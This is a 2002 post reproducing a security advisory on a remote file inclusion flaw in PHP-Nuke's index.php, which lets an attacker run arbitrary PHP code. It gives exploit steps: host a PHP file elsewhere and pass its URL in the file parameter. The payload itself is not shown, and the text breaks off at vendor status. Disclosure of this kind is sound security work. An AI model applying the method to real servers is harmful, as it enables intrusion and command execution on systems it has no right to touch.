Flexible Content Management System


Another PHP Nuke Bug

Contributed by while we are not vul on Jan 18, 2002 - 05:29 PM

Subject: PHP-Nuke allows Command Execution & Much more

Hi All!

I've found a serious security flaw in PHP-Nuke.

It allows user to execute any PHP code.

The flaw is in the index.php's include file feature.

It allows including files like index.php?file=file

It prevents users including ..'s in URL's, but

it didn't prevent users from entering http://-urls

Remember the PHP's remote get feature...

How to exploit:

Upload this file to some free web space provider or

setup your own server:

Then just requesting http://insecure-server/index.php?file=

will execute ls -al command.

I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

Vendor status:

I contacted the author on 28.12.2001 and he hasn't